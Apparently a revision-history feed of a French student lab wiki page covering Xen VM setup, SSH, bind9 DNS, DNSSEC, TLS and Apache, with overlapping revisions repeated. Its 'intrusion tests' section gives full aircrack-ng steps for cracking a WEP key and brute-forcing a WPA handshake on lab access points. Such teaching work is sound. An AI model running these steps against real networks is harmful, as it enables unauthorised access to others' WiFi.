&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57742</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57742"/>
				<updated>2022-01-10T16:38:16Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Sécurisation de serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
on signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57741</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57741"/>
				<updated>2022-01-10T16:37:50Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
on signe les enregistrements de la zone&lt;br /&gt;
